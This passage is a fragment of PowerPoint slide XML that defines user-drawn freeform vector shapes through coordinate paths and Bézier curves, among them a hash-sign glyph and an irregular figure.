                  <a:gd name="T29" fmla="*/ 152 h 219"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61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60 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>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5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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281"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="739"/>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Freeform 282"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="739"/>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283"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="73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Freeform 284"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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285"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 286"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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287"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 288"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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289"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="73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Freeform 290"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="73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291"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 292"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="617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293"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="632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Freeform 294"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="651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295"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944"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Freeform 296"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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297"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="728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Freeform 298"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="748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299"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="76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Freeform 300"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="730"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 202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8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4 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 74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6 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 146 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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4"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="155"/>
                      <a:pt x="23" y="150"/>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4"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="137"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="33"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="158" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="67"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="73"/>
                      <a:pt x="65" y="75"/>
                      <a:pt x="64" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="89"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59"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6"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8" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="138"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="186"/>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3"/>
                      <a:pt x="117" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="117"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
